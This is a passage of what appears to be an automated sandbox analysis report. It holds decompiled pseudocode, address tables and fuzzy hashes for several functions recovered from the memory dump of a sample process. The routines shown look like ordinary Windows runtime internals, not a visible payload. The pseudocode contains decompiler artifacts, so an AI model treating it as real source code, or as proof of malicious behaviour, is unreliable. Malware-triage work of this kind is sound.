							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00A6F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                              0x00a52ae4
                                                              0x00a52aec
                                                              0x00a52aef
                                                              0x00a52af4
                                                              0x00a52af7
                                                              0x00a52afd
                                                              0x00a52b92
                                                              0x00a52b92
                                                              0x00a52b97
                                                              0x00a52b9c
                                                              0x00a52b9c
                                                              0x00a52b03
                                                              0x00a52b06
                                                              0x00a52b09
                                                              0x00a52b09
                                                              0x00a52b0f
                                                              0x00a52b15
                                                              0x00a52b15
                                                              0x00a52b1b
                                                              0x00a52b1e
                                                              0x00a52b21
                                                              0x00a52b26
                                                              0x00a52b29
                                                              0x00a52b81
                                                              0x00a52b84
                                                              0x00a52c0e
                                                              0x00a52c15
                                                              0x00a52c24
                                                              0x00a52c24
                                                              0x00a52b8a
                                                              0x00a52b8a
                                                              0x00a52b8a
                                                              0x00a52b8a
                                                              0x00a52b90
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52b4a
                                                              0x00a52b4a
                                                              0x00a52b4d
                                                              0x00a52b53
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52b55
                                                              0x00a52b58
                                                              0x00a52bb7
                                                              0x00a95d1b
                                                              0x00a95d37
                                                              0x00a95d47
                                                              0x00a95d53
                                                              0x00a52bbd
                                                              0x00a52bbd
                                                              0x00a52bbd
                                                              0x00a52bb7
                                                              0x00a52b5d
                                                              0x00a52c2f
                                                              0x00a95d5b
                                                              0x00a95d77
                                                              0x00a95d87
                                                              0x00a95d93
                                                              0x00a52c35
                                                              0x00a52c35
                                                              0x00a52c35
                                                              0x00a52c2f
                                                              0x00a52b65
                                                              0x00a52b9f
                                                              0x00a52ba2
                                                              0x00a52b67
                                                              0x00a52b67
                                                              0x00a52b69
                                                              0x00a52b6b
                                                              0x00a52b6e
                                                              0x00a52bc9
                                                              0x00a52bcc
                                                              0x00a52bcf
                                                              0x00a52bd4
                                                              0x00a52bd6
                                                              0x00a52bd6
                                                              0x00a52bdb
                                                              0x00a52c02
                                                              0x00a52c05
                                                              0x00a52c07
                                                              0x00000000
                                                              0x00a52c07
                                                              0x00a52be0
                                                              0x00a52c00
                                                              0x00a52c3f
                                                              0x00a52c3f
                                                              0x00000000
                                                              0x00a52c00
                                                              0x00a52be5
                                                              0x00a52be7
                                                              0x00a52bec
                                                              0x00a52bf4
                                                              0x00a52bf6
                                                              0x00000000
                                                              0x00a52bf6
                                                              0x00a52b70
                                                              0x00a52b76
                                                              0x00a52b2b
                                                              0x00a52b2b
                                                              0x00a52b2d
                                                              0x00a52b2f
                                                              0x00a52b32
                                                              0x00a52b35
                                                              0x00a52b3a
                                                              0x00000000
                                                              0x00a52b40
                                                              0x00a52b43
                                                              0x00a52b45
                                                              0x00a52b47
                                                              0x00a52b4a
                                                              0x00a52b4d
                                                              0x00a52b53
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52b53
                                                              0x00a52b78
                                                              0x00a52b78
                                                              0x00a52b7b
                                                              0x00a52b7e
                                                              0x00000000
                                                              0x00a52b7e
                                                              0x00a52b76
                                                              0x00a52ba5
                                                              0x00a52ba5
                                                              0x00a52ba8
                                                              0x00a52bad
                                                              0x00000000
                                                              0x00000000
                                                              0x00a52baf
                                                              0x00a52baf
                                                              0x00a52bc2
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76a4e755f6d78ead8a597ad58dcb0974c031302fd1d05ca93fbde7162d844cb1
                                                              • Instruction ID: ea1ff36f5ca8647941cd63ad2b350dbeb2440c1e663df28b02b988a7050483be
                                                              • Opcode Fuzzy Hash: 76a4e755f6d78ead8a597ad58dcb0974c031302fd1d05ca93fbde7162d844cb1
                                                              • Instruction Fuzzy Hash: A851B176B001158FCB18CF1DC880ABDB7B1FB9A701716855AEC46AB325DB30AE55DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AEAE44 Relevance: .2, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			E00AEAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E00AEC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E00AEACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E00AEFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E00AEEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E00A47D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E00AE1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E00AF1536(0xb18ae4, (_t74 -  *0xb18b04 >> 0x14) + (_t74 -  *0xb18b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L00AEC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E00AEA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E00ACCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E00AEACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                              0x00aeae44
                                                              0x00aeae4c
                                                              0x00aeae53
                                                              0x00aeae55
                                                              0x00aeae5c
                                                              0x00aeae64
                                                              0x00aeae68
                                                              0x00aeae75
                                                              0x00aeae75
                                                              0x00aeae78
                                                              0x00aeae7a
                                                              0x00aeae7c
                                                              0x00aeae7f
                                                              0x00aeaea8
                                                              0x00aeaeab
                                                              0x00aeaead
                                                              0x00000000
                                                              0x00000000
                                                              0x00aeaeb3
                                                              0x00aeaeb8
                                                              0x00aeaebb
                                                              0x00aeaebd
                                                              0x00000000
                                                              0x00aeae81
                                                              0x00aeae88
                                                              0x00aeae8f
                                                              0x00aeae9b
                                                              0x00aeae96
                                                              0x00aeae96
                                                              0x00aeae96
                                                              0x00aeaea0
                                                              0x00aeaea3
                                                              0x00aeaebf
                                                              0x00aeaebf
                                                              0x00aeaec3
                                                              0x00aeaec9
                                                              0x00aeaf0d
                                                              0x00aeaf14
                                                              0x00aeaf3d
                                                              0x00aeaf3d
                                                              0x00aeaf41
                                                              0x00aeaf44
                                                              0x00aeaf67
                                                              0x00aeaf67
                                                              0x00aeaf6a
                                                              0x00aeafca
                                                              0x00aeafd1
                                                              0x00000000
                                                              0x00aeafd1
                                                              0x00aeaf6c
                                                              0x00aeaf6d
                                                              0x00aeaf75
                                                              0x00aeaf7c
                                                              0x00aeaf7e
                                                              0x00aeaf80
                                                              0x00aeaf85
                                                              0x00aeaf87
                                                              0x00aeaf99
                                                              0x00aeaf89
                                                              0x00aeaf92
                                                              0x00aeaf92
                                                              0x00aeaf9e
                                                              0x00aeafa1
                                                              0x00aeafa3
                                                              0x00aeafa9
                                                              0x00aeafb0
                                                              0x00aeafb2
                                                              0x00aeafb4
                                                              0x00aeafbc
                                                              0x00aeafbc
                                                              0x00aeafb4
                                                              0x00aeafb0
                                                              0x00000000
                                                              0x00aeafa1
                                                              0x00aeaf4f
                                                              0x00aeaf57
                                                              0x00aeaf5c
                                                              0x00aeaf5e
                                                              0x00000000
                                                              0x00000000
                                                              0x00aeaf60
                                                              0x00aeaf64
                                                              0x00aeaf64
                                                              0x00000000
                                                              0x00aeaf64
                                                              0x00aeaf1a
                                                              0x00aeaf25
                                                              0x00000000
                                                              0x00000000
                                                              0x00aeaf27
                                                              0x00aeaf28
                                                              0x00aeaf33
                                                              0x00000000
                                                              0x00aeaed0
                                                              0x00aeaed0
                                                              0x00aeaed2
                                                              0x00aeaee1
                                                              0x00aeaee4
                                                              0x00000000
                                                              0x00000000
                                                              0x00aeaee6
                                                              0x00aeaeec
                                                              0x00000000
                                                              0x00000000
                                                              0x00aeaefb
                                                              0x00aeaf07
                                                              0x00aeafd3
                                                              0x00aeafdb
                                                              0x00aeafdb
                                                              0x00000000
                                                              0x00aeaf07
                                                              0x00aeaed6
                                                              0x00aeaed8
                                                              0x00aeaedf
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aeaedf
                                                              0x00aeaec9

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d08226cfbca41856ced1834d9be121c2b58b89d29137af6f9dd7c4860381bd07
                                                              • Instruction ID: 10ef95f06c530aeca09111ab261682ac624df08181c11a6debbb95721e5328f3
                                                              • Opcode Fuzzy Hash: d08226cfbca41856ced1834d9be121c2b58b89d29137af6f9dd7c4860381bd07
                                                              • Instruction Fuzzy Hash: 4D4107B17006919BD72ADB2BC895B3BB799EFA4720F148319F81687290DB34FC01C692
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A4DBE9 Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			E00A4DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E00A2CC50(E00A24510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E00A47D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E00AF8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00A42280(_t58, _v44);
						E00A4DD82(_v44, _t102, _t98);
						E00A4B944(_t102, _v5);
						return E00A3FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0xb18628; // 0x0
							_v28 = _t67;
							_t68 =  *0xb1862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0xb18628; // 0x0
						_t105 = _v28;
						_t80 =  *0xb1862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0xaefb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                              0x00a4dbe9
                                                              0x00a4dbf2
                                                              0x00a4dbf7
                                                              0x00a4dbf9
                                                              0x00a4dbfc
                                                              0x00a4dc00
                                                              0x00a4dc03
                                                              0x00a4dc14
                                                              0x00a4dd54
                                                              0x00a4dd54
                                                              0x00a4dd54
                                                              0x00a4dc18
                                                              0x00a4dc1d
                                                              0x00a4dc1d
                                                              0x00a4dc32
                                                              0x00a4dc3b
                                                              0x00a4dc3e
                                                              0x00a4dc46
                                                              0x00a4dd5b
                                                              0x00a4dd62
                                                              0x00a4dd64
                                                              0x00a4dd67
                                                              0x00a4dd69
                                                              0x00a4dd6b
                                                              0x00a4dd6e
                                                              0x00a4dd70
                                                              0x00a4dd73
                                                              0x00a4dd73
                                                              0x00000000
                                                              0x00a4dc4c
                                                              0x00a4dc4e
                                                              0x00a93ae3
                                                              0x00a93ae8
                                                              0x00a93aea
                                                              0x00a4dce7
                                                              0x00a4dce9
                                                              0x00a4dcec
                                                              0x00a4dcee
                                                              0x00a4dcf0
                                                              0x00a4dcf3
                                                              0x00a4dcf5
                                                              0x00a93af2
                                                              0x00a93af5
                                                              0x00a93af5
                                                              0x00a4dd06
                                                              0x00a4dd08
                                                              0x00a4dd0b
                                                              0x00a4dd12
                                                              0x00a93b08
                                                              0x00a4dd18
                                                              0x00a4dd18
                                                              0x00a4dd18
                                                              0x00a4dd20
                                                              0x00a4dd23
                                                              0x00a93b16
                                                              0x00a93b16
                                                              0x00a4dd29
                                                              0x00a4dd2d
                                                              0x00a4dd36
                                                              0x00a4dd40
                                                              0x00a4dd51
                                                              0x00a4dd51
                                                              0x00a4dc54
                                                              0x00a4dc59
                                                              0x00a4dc59
                                                              0x00a4dc5e
                                                              0x00a4dc5e
                                                              0x00a4dc63
                                                              0x00a4dc66
                                                              0x00a4dc6b
                                                              0x00a4dc78
                                                              0x00a4dc7b
                                                              0x00a4dc81
                                                              0x00a4dc81
                                                              0x00a4dc83
                                                              0x00a4dc89
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4dd7b
                                                              0x00a4dd7b
                                                              0x00a4dc8f
                                                              0x00a4dc8f
                                                              0x00a4dc92
                                                              0x00a4dc99
                                                              0x00a4dc9f
                                                              0x00a4dca5
                                                              0x00a4dcaa
                                                              0x00a4dcaa
                                                              0x00a4dcb3
                                                              0x00a4dcb8
                                                              0x00a4dcbb
                                                              0x00a4dcc1
                                                              0x00a4dccf
                                                              0x00a4dcd2
                                                              0x00a4dcd5
                                                              0x00a4dcd7
                                                              0x00a4dcda
                                                              0x00a4dcdc
                                                              0x00a4dcdc
                                                              0x00a4dce2
                                                              0x00a4dce4
                                                              0x00000000
                                                              0x00a4dce4

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db50119e3d238608c9eb34778e400e58867824de34fafac6548217b07691b5b9
                                                              • Instruction ID: b30e44b7a106c447d9cd59841647caf0f34bdabaf6a3406a50a6d0c014e0b15d
                                                              • Opcode Fuzzy Hash: db50119e3d238608c9eb34778e400e58867824de34fafac6548217b07691b5b9
                                                              • Instruction Fuzzy Hash: 5551AC79E01215CFCF14CFA8C590AAEBBF1BF88310F20855AE959AB340DB31AD44CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3EF40 Relevance: .1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00A3EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00A29080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d0c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00A22D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                              0x00a3ef4b
                                                              0x00a3ef4d
                                                              0x00a3ef57
                                                              0x00a3f0bd
                                                              0x00a3f0c2
                                                              0x00a3f0d2
                                                              0x00a3f0d2
                                                              0x00a3f0c2
                                                              0x00a3ef5d
                                                              0x00a3ef5f
                                                              0x00a3ef67
                                                              0x00a3ef6a
                                                              0x00a3ef6d
                                                              0x00a3ef74
                                                              0x00a3ef7f
                                                              0x00a3ef82
                                                              0x00a3ef82
                                                              0x00a3ef86
                                                              0x00a3ef88
                                                              0x00a3ef8c
                                                              0x00a3ef8f
                                                              0x00a3ef8f
                                                              0x00a3ef8f
                                                              0x00000000
                                                              0x00a3ef91
                                                              0x00a3ef93
                                                              0x00a3efc4
                                                              0x00a3efc4
                                                              0x00a3efc4
                                                              0x00a3efca
                                                              0x00a3efd0
                                                              0x00a3f0a6
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3f0af
                                                              0x00a8bb06
                                                              0x00a8bb0a
                                                              0x00a3f0b5
                                                              0x00a3f0b5
                                                              0x00a3f0b5
                                                              0x00a3f0b5
                                                              0x00000000
                                                              0x00a3efd6
                                                              0x00a3efd9
                                                              0x00a3f0de
                                                              0x00a3f0e2
                                                              0x00a3efdf
                                                              0x00a3efdf
                                                              0x00a3efdf
                                                              0x00a3efe5
                                                              0x00a8bafc
                                                              0x00a8bafc
                                                              0x00a3efe5
                                                              0x00a3efeb
                                                              0x00a3efed
                                                              0x00a3f00f
                                                              0x00a3f011
                                                              0x00a3f01a
                                                              0x00a3f01d
                                                              0x00a3f021
                                                              0x00a3f028
                                                              0x00a3f029
                                                              0x00a3f029
                                                              0x00a3f02c
                                                              0x00000000
                                                              0x00a3f02c
                                                              0x00a3eff3
                                                              0x00a3eff9
                                                              0x00a3f0ea
                                                              0x00a3f0ed
                                                              0x00a3f0ef
                                                              0x00000000
                                                              0x00a3f0ef
                                                              0x00a3f003
                                                              0x00a8bb12
                                                              0x00a3f045
                                                              0x00a3f049
                                                              0x00a3f051
                                                              0x00a3f09e
                                                              0x00a3f0a0
                                                              0x00a3f0a0
                                                              0x00a3f09e
                                                              0x00a3f053
                                                              0x00a3f064
                                                              0x00a3f064
                                                              0x00a3f06b
                                                              0x00a8bb1a
                                                              0x00a8bb1a
                                                              0x00a3f071
                                                              0x00a3f071
                                                              0x00a3f07d
                                                              0x00a3f082
                                                              0x00a3f08f
                                                              0x00a3f08f
                                                              0x00a3f009
                                                              0x00a3f00d
                                                              0x00000000
                                                              0x00a3f00d
                                                              0x00a3efd0
                                                              0x00a3ef97
                                                              0x00a3efa5
                                                              0x00a3efaa
                                                              0x00000000
                                                              0x00a3efac
                                                              0x00a3efac
                                                              0x00a3efac
                                                              0x00000000
                                                              0x00a3efb2
                                                              0x00a3f036
                                                              0x00a3f03a
                                                              0x00a3f040
                                                              0x00a3f090
                                                              0x00000000
                                                              0x00a3f092
                                                              0x00a3f042
                                                              0x00000000
                                                              0x00a3f042
                                                              0x00a3efb7
                                                              0x00a3efb9
                                                              0x00a3efbc
                                                              0x00a3efb0
                                                              0x00a3efb0
                                                              0x00000000
                                                              0x00a3efbe
                                                              0x00a3efbe
                                                              0x00a3efc1
                                                              0x00000000
                                                              0x00a3efc1
                                                              0x00a3efbc
                                                              0x00a3efaa
                                                              0x00a3ef91

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction ID: e3679fc01328a22cfb36479e0bce3e357e8e6d2daf59a6474d74abcba014e8d1
                                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction Fuzzy Hash: 4F510530E04249EFDB28CB6CC1D47AEFBB1AF56314F2881B8E44597282D3B5AD89D751
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF740D Relevance: .1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 84%
                                                              			E00AF740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
